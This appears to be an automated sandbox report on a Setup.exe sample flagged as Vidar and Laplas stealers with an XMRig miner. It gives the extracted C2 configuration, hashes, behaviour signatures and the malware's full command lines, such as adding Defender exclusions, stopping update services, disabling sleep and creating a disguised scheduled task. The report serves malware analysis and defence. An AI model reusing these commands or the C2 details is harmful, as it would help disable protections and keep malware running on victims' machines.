Analysis
-
max time kernel
146s -
max time network
161s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
02-05-2023 13:21
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20230220-en
General
-
Target
Setup.exe
-
Size
999.0MB
-
MD5
f5888302a0b612329e34cdc1e9eaf5f3
-
SHA1
8bab0b31a6458b38b59550000f100a206606a8e8
-
SHA256
8092ed5ee401cbaad77a932e0bbb8bcbb430576140ca4a8c4ed06de4d58b8cbb
-
SHA512
6a218be3991ff43142a154d9958b5c6c5a3451e536545f674fc412fec82fa82d3f3f71626cb0cb1d402c0e724567365843954ecc76b6485cd78bf4452ad21311
-
SSDEEP
49152:FBDq8sOA33dz7DqhCKWqo/+kZjukM32wFH1gENeAsm81ZJ13BWIhIzwFiheeX5NT:4Ux
Malware Config
Extracted
vidar
3.7
940745c5e5d7ca4cbbc384bc174775e2
https://steamcommunity.com/profiles/76561199501059503
https://t.me/mastersbots
-
profile_id_v2
940745c5e5d7ca4cbbc384bc174775e2
-
user_agent
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Extracted
laplas
http://185.209.161.89
-
api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1460 created 1220 1460 68932182267870953260.exe 12 PID 1460 created 1220 1460 68932182267870953260.exe 12 PID 1460 created 1220 1460 68932182267870953260.exe 12 PID 1460 created 1220 1460 68932182267870953260.exe 12 PID 1460 created 1220 1460 68932182267870953260.exe 12 PID 1888 created 1220 1888 updater.exe 12 PID 1888 created 1220 1888 updater.exe 12 PID 1888 created 1220 1888 updater.exe 12 PID 1888 created 1220 1888 updater.exe 12 PID 1888 created 1220 1888 updater.exe 12 PID 1888 created 1220 1888 updater.exe 12 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 31216519167704260764.exe -
XMRig Miner payload 3 IoCs
resource yara_rule behavioral1/memory/1888-266-0x000000013F960000-0x0000000140345000-memory.dmp xmrig behavioral1/memory/1752-270-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1752-274-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts 68932182267870953260.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 31216519167704260764.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 31216519167704260764.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe -
Executes dropped EXE 5 IoCs
pid Process 1740 31216519167704260764.exe 1460 68932182267870953260.exe 1824 23853730528723312731.exe 1888 updater.exe 944 ntlhost.exe -
Loads dropped DLL 8 IoCs
pid Process 1768 AddInProcess32.exe 1768 AddInProcess32.exe 1768 AddInProcess32.exe 1768 AddInProcess32.exe 1768 AddInProcess32.exe 1768 AddInProcess32.exe 1952 taskeng.exe 1740 31216519167704260764.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" 31216519167704260764.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 31216519167704260764.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1740 31216519167704260764.exe 944 ntlhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1244 set thread context of 1768 1244 Setup.exe 28 PID 1888 set thread context of 676 1888 updater.exe 83 PID 1888 set thread context of 1752 1888 updater.exe 82 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 68932182267870953260.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1640 sc.exe 952 sc.exe 1868 sc.exe 1524 sc.exe 1164 sc.exe 1764 sc.exe 1728 sc.exe 1376 sc.exe 1720 sc.exe 2008 sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AddInProcess32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AddInProcess32.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 908 schtasks.exe 700 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1748 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 20 Go-http-client/1.1 -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 607276590a7dd901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
pid Process 1768 AddInProcess32.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1576 powershell.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1104 powershell.exe 1460 68932182267870953260.exe 1460 68932182267870953260.exe 1888 updater.exe 1888 updater.exe 1540 powershell.exe 1888 updater.exe 1888 updater.exe 1888 updater.exe 1888 updater.exe 1888 updater.exe 1888 updater.exe 596 powershell.exe 1888 updater.exe 1888 updater.exe 1888 updater.exe 1888 updater.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe 1752 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1576 powershell.exe Token: SeShutdownPrivilege 1624 powercfg.exe Token: SeDebugPrivilege 1104 powershell.exe Token: SeShutdownPrivilege 1524 powercfg.exe Token: SeShutdownPrivilege 1400 powercfg.exe Token: SeShutdownPrivilege 1720 powercfg.exe Token: SeDebugPrivilege 1540 powershell.exe Token: SeShutdownPrivilege 1572 powercfg.exe Token: SeShutdownPrivilege 1096 powercfg.exe Token: SeDebugPrivilege 596 powershell.exe Token: SeShutdownPrivilege 1620 powercfg.exe Token: SeShutdownPrivilege 1824 powercfg.exe Token: SeDebugPrivilege 1888 updater.exe Token: SeLockMemoryPrivilege 1752 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1244 wrote to memory of 1768 1244 Setup.exe 28 PID 1768 wrote to memory of 1740 1768 AddInProcess32.exe 32 PID 1768 wrote to memory of 1740 1768 AddInProcess32.exe 32 PID 1768 wrote to memory of 1740 1768 AddInProcess32.exe 32 PID 1768 wrote to memory of 1740 1768 AddInProcess32.exe 32 PID 1768 wrote to memory of 1460 1768 AddInProcess32.exe 33 PID 1768 wrote to memory of 1460 1768 AddInProcess32.exe 33 PID 1768 wrote to memory of 1460 1768 AddInProcess32.exe 33 PID 1768 wrote to memory of 1460 1768 AddInProcess32.exe 33 PID 1768 wrote to memory of 1824 1768 AddInProcess32.exe 34 PID 1768 wrote to memory of 1824 1768 AddInProcess32.exe 34 PID 1768 wrote to memory of 1824 1768 AddInProcess32.exe 34 PID 1768 wrote to memory of 1824 1768 AddInProcess32.exe 34 PID 1824 wrote to memory of 1356 1824 23853730528723312731.exe 36 PID 1824 wrote to memory of 1356 1824 23853730528723312731.exe 36 PID 1824 wrote to memory of 1356 1824 23853730528723312731.exe 36 PID 1768 wrote to memory of 836 1768 AddInProcess32.exe 35 PID 1768 wrote to memory of 836 1768 AddInProcess32.exe 35 PID 1768 wrote to memory of 836 1768 AddInProcess32.exe 35 PID 1768 wrote to memory of 836 1768 AddInProcess32.exe 35 PID 836 wrote to memory of 1748 836 cmd.exe 39 PID 836 wrote to memory of 1748 836 cmd.exe 39 PID 836 wrote to memory of 1748 836 cmd.exe 39 PID 836 wrote to memory of 1748 836 cmd.exe 39 PID 1356 wrote to memory of 1688 1356 cmd.exe 40 PID 1356 wrote to memory of 1688 1356 cmd.exe 40 PID 1356 wrote to memory of 1688 1356 cmd.exe 40 PID 1876 wrote to memory of 1728 1876 cmd.exe 45 PID 1876 wrote to memory of 1728 1876 cmd.exe 45 PID 1876 wrote to memory of 1728 1876 cmd.exe 45 PID 1876 wrote to memory of 1376 1876 cmd.exe 46 PID 1876 wrote to memory of 1376 1876 cmd.exe 46 PID 1876 wrote to memory of 1376 1876 cmd.exe 46 PID 1876 wrote to memory of 1640 1876 cmd.exe 47 PID 1876 wrote to memory of 1640 1876 cmd.exe 47 PID 1876 wrote to memory of 1640 1876 cmd.exe 47 PID 1876 wrote to memory of 952 1876 cmd.exe 48 PID 1876 wrote to memory of 952 1876 cmd.exe 48 PID 1876 wrote to memory of 952 1876 cmd.exe 48 PID 1876 wrote to memory of 1868 1876 cmd.exe 49 PID 1876 wrote to memory of 1868 1876 cmd.exe 49 PID 1876 wrote to memory of 1868 1876 cmd.exe 49 PID 1200 wrote to memory of 1624 1200 cmd.exe 54 PID 1200 wrote to memory of 1624 1200 cmd.exe 54 PID 1200 wrote to memory of 1624 1200 cmd.exe 54 PID 1200 wrote to memory of 1524 1200 cmd.exe 55 PID 1200 wrote to memory of 1524 1200 cmd.exe 55 PID 1200 wrote to memory of 1524 1200 cmd.exe 55 PID 1200 wrote to memory of 1400 1200 cmd.exe 56 PID 1200 wrote to memory of 1400 1200 cmd.exe 56 PID 1200 wrote to memory of 1400 1200 cmd.exe 56 PID 1200 wrote to memory of 1720 1200 cmd.exe 57 PID 1200 wrote to memory of 1720 1200 cmd.exe 57 PID 1200 wrote to memory of 1720 1200 cmd.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\ProgramData\31216519167704260764.exe"C:\ProgramData\31216519167704260764.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1740 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:944
-
-
-
C:\ProgramData\68932182267870953260.exe"C:\ProgramData\68932182267870953260.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1460
-
-
C:\ProgramData\23853730528723312731.exe"C:\ProgramData\23853730528723312731.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\23853730528723312731.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 06⤵PID:1688
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:1748
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1728
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1376
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1640
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1868
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ipspm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1104 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:908
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1152
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1524
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1164
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2008
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1764
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ipspm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:596 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:700
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:768
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:676
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {107313AA-8836-4648-B4C9-6323B4E4D3A4} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:1952 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
MD5e73194a403fd143a40a887531094257f
SHA17b733ecd885071e391be8be0ca0ddb821e2cce13
SHA256a885b6fa15bdd671b472e5f08c3965af4e47050c2b4cc0f9068c1485d0eb2f78
SHA512341a117c39b4dd9e943a4fd9a87cef5f7b02338f0c1dd2b0574371d6e0ee61e4cae8086a156e95ea87a28d3494347d4317be1aedaba417005c8a01bfdb20579f
-
Filesize
9.9MB
MD5e73194a403fd143a40a887531094257f
SHA17b733ecd885071e391be8be0ca0ddb821e2cce13
SHA256a885b6fa15bdd671b472e5f08c3965af4e47050c2b4cc0f9068c1485d0eb2f78
SHA512341a117c39b4dd9e943a4fd9a87cef5f7b02338f0c1dd2b0574371d6e0ee61e4cae8086a156e95ea87a28d3494347d4317be1aedaba417005c8a01bfdb20579f
-
Filesize
13.9MB
MD52772620ca4335393e1829696928379cf
SHA18e588a4d4296a77486da4b96053f5a4a510eb0da
SHA25680e2c14e74e10e059482e35677500fe1cc582e1c8f6a93a9f6d0d60124fe4123
SHA5126f18067ab12d4123b7fd1363d4f92d62ff4ea3b38635d39a256d3a779786f286083db0e28f3b3438db501bca1e629c90c171a57101bb60928ad33b91e0f4961b
-
Filesize
13.9MB
MD52772620ca4335393e1829696928379cf
SHA18e588a4d4296a77486da4b96053f5a4a510eb0da
SHA25680e2c14e74e10e059482e35677500fe1cc582e1c8f6a93a9f6d0d60124fe4123
SHA5126f18067ab12d4123b7fd1363d4f92d62ff4ea3b38635d39a256d3a779786f286083db0e28f3b3438db501bca1e629c90c171a57101bb60928ad33b91e0f4961b
-
Filesize
4.2MB
MD514f4039b480ee54240b370d381cf757b
SHA135c2b6ed557702b8d3f2b6040742c7997276a2ba
SHA256b3f38abca5d0aaaecd1ea88fa98148e276ba16852093fbc12d619382fe2a5290
SHA5126441b21ab2558c3f590afb40b7783280392486b61d003eba06389449e94be57e9636c5ec9d746323202cd5110b5c0e9fef3bd0d59ba5ae03a1d9fa79821f44b1
-
Filesize
4.2MB
MD514f4039b480ee54240b370d381cf757b
SHA135c2b6ed557702b8d3f2b6040742c7997276a2ba
SHA256b3f38abca5d0aaaecd1ea88fa98148e276ba16852093fbc12d619382fe2a5290
SHA5126441b21ab2558c3f590afb40b7783280392486b61d003eba06389449e94be57e9636c5ec9d746323202cd5110b5c0e9fef3bd0d59ba5ae03a1d9fa79821f44b1
-
Filesize
4.2MB
MD514f4039b480ee54240b370d381cf757b
SHA135c2b6ed557702b8d3f2b6040742c7997276a2ba
SHA256b3f38abca5d0aaaecd1ea88fa98148e276ba16852093fbc12d619382fe2a5290
SHA5126441b21ab2558c3f590afb40b7783280392486b61d003eba06389449e94be57e9636c5ec9d746323202cd5110b5c0e9fef3bd0d59ba5ae03a1d9fa79821f44b1
-
Filesize
9.9MB
MD5e73194a403fd143a40a887531094257f
SHA17b733ecd885071e391be8be0ca0ddb821e2cce13
SHA256a885b6fa15bdd671b472e5f08c3965af4e47050c2b4cc0f9068c1485d0eb2f78
SHA512341a117c39b4dd9e943a4fd9a87cef5f7b02338f0c1dd2b0574371d6e0ee61e4cae8086a156e95ea87a28d3494347d4317be1aedaba417005c8a01bfdb20579f
-
Filesize
9.9MB
MD5e73194a403fd143a40a887531094257f
SHA17b733ecd885071e391be8be0ca0ddb821e2cce13
SHA256a885b6fa15bdd671b472e5f08c3965af4e47050c2b4cc0f9068c1485d0eb2f78
SHA512341a117c39b4dd9e943a4fd9a87cef5f7b02338f0c1dd2b0574371d6e0ee61e4cae8086a156e95ea87a28d3494347d4317be1aedaba417005c8a01bfdb20579f
-
Filesize
9.9MB
MD5e73194a403fd143a40a887531094257f
SHA17b733ecd885071e391be8be0ca0ddb821e2cce13
SHA256a885b6fa15bdd671b472e5f08c3965af4e47050c2b4cc0f9068c1485d0eb2f78
SHA512341a117c39b4dd9e943a4fd9a87cef5f7b02338f0c1dd2b0574371d6e0ee61e4cae8086a156e95ea87a28d3494347d4317be1aedaba417005c8a01bfdb20579f
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ca6924e3b80c0b22f68a65608f7adae1
SHA17f30427e2a40d2c2320cb3fc6d1e9ac651a2e3ff
SHA25668e68067ca52a3ed70af6354216261c63ac1a7aac5917cd94dc117cfbfd7aa22
SHA512cca8e834b31e81d568b2d99cd3e994a536fe43180f017cc58678bc5b475e95c9a828bf0138d3c18cea77b10ffd322063526ac3f55bbd4bf70f2dbd5783a41030
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6NT6FIM9H5J2HBF4MXPC.temp
Filesize7KB
MD5ca6924e3b80c0b22f68a65608f7adae1
SHA17f30427e2a40d2c2320cb3fc6d1e9ac651a2e3ff
SHA25668e68067ca52a3ed70af6354216261c63ac1a7aac5917cd94dc117cfbfd7aa22
SHA512cca8e834b31e81d568b2d99cd3e994a536fe43180f017cc58678bc5b475e95c9a828bf0138d3c18cea77b10ffd322063526ac3f55bbd4bf70f2dbd5783a41030
-
Filesize
550.3MB
MD5f9d91cd78979ad98edea45e2ddcdd7bb
SHA1adbcd365904fd30d1deb684986beb22715d8c188
SHA256f136fa602bd2f5d4bd2019bdf4cb5cd7db8cb30fb6baa79409813ce3304ab0d1
